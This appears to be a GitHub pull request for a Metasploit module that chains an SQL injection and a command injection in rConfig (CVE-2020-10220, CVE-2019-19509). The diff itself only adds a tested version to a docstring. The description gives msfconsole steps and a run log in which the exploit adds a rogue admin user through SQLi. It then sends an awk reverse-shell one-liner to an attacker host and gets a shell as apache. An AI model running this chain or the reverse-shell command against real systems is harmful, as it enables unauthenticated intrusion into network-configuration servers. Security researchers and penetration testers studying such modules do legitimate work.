### PR TITLE
Update rconfig_ajaxarchivefiles_rce.rb

### DIFF
--- a/modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
+++ b/modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
         interface in order to execute the payload. 
         Valid credentials for a user with administrative privileges are required.
         However, this module can bypass authentication via SQLI.
-        This module has been successfully tested on Rconfig 3.9.4.
+        This module has been successfully tested on Rconfig 3.9.3 and 3.9.4.
 
         The steps are:
           1. SQLi on /commands.inc.php allow us to add an administrative user.


### PR DESCRIPTION
Add rConfig exploit (chained CVE-2020-10220 + CVE-2019-19509).

```
CVE-2019-19509 :
An issue was discovered in rConfig 3.9.3. A remote authenticated user can directly execute system commands by sending a GET request to ajaxArchiveFiles.php because the path parameter is passed to the exec function without filtering, which can lead to command execution.

CVE-2020-10220 :
An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter.
```

Exploit walkthrough: https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_root_RCE_unauth.py

## Verification
List the steps needed to make sure this thing works
- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/rconfig_ajaxarchivefiles_rce_final`
- [ ] `set RHOSTS target_ip`
- [ ] `set RPORT target_port`
- [ ] `set LHOST your_ip`
- [ ] `set LPORT your_port`
- [ ] `set verbose true`
- [ ] `exploit -j`

## Scenario
```
resource (rconfig_final.rc)> use exploit/linux/http/rconfig_ajaxarchivefiles_rce_final
resource (rconfig_final.rc)> set RHOSTS 1.1.1.1
resource (rconfig_final.rc)> set RPORT 443
resource (rconfig_final.rc)> set LHOST 1.1.1.2
resource (rconfig_final.rc)> set LPORT 3333
resource (rconfig_final.rc)> set verbose true
resource (rconfig_final.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 1.1.1.2:3333 
msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce_final) > 
[*] STEP 0: Get rConfig version...
[*] rConfig version 3.9 detected
[*] STEP 1 : Adding a temporary admin user...
[+] New temporary user ElCWcNJhUId created
[*] STEP 2: Authenticating as ElCWcNJhUId ...
[+] Authenticated as user ElCWcNJhUId
[*] STEP 3: Executing the command (awk 'BEGIN{s="/inet/tcp/0/1.1.1.2/3333";while(1){do{s|&getline c;if(c){while((c|&getline)>0)print $0|&s;close(c)}}while(c!="exit");close(s)}}')
[*] Command shell session 1 opened (1.1.1.2:3333 -> 1.1.1.1:39076) at 2020-03-10 15:50:44 +0100
[+] Command sucessfully executed
[*] STEP 4 : Removing the temporary admin user...
[*] User ElCWcNJhUId removed successfully !

msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce_final) > sessions -i 1
[*] Starting interaction with 1...

id
uid=48(apache) gid=48(apache) groups=48(apache)
```